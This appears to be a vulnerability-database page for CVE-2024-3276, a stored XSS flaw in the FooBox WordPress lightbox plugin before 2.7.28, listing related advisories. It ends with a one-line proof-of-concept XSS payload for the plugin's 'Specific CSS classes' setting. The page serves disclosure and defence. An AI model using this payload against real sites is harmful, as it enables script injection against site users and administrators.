FooBox XSS vulnerability - Update by June 11, 2024
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
Cvelist | CVE-2024-3276 FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS | 18 Jun 2024 06:00 | – | cvelist |
Patchstack | WordPress FooBox Image Lightbox Plugin < 2.7.28 is vulnerable to Cross Site Scripting (XSS) | 28 May 2024 00:00 | – | patchstack |
Patchstack | WordPress Foobox Image Lightbox Premium Plugin < 2.7.28 is vulnerable to Cross Site Scripting (XSS) | 28 May 2024 00:00 | – | patchstack |
Vulnrichment | CVE-2024-3276 FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS | 18 Jun 2024 06:00 | – | vulnrichment |
WPVulnDB | FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS | 28 May 2024 00:00 | – | wpvulndb |
NVD | CVE-2024-3276 | 18 Jun 2024 06:15 | – | nvd |
CVE | CVE-2024-3276 | 18 Jun 2024 06:15 | – | cve |
Wordfence Blog | Wordfence Intelligence Weekly WordPress Vulnerability Report (May 27, 2024 to June 2, 2024) | 6 Jun 2024 15:09 | – | wordfence |
Source | Link |
---|---|
research | www.research.cleantalk.org/cve-2024-3276/ |
Go to settings and change the "Specific CSS classes" field to 123"</script><img src=x onerror=alert(1)>alert(1)

(Admins and editors are allowed to use JS in posts/pages/comments/etc., so the unfiltered_html capability should be disallowed when testing for Stored XSS using such roles.)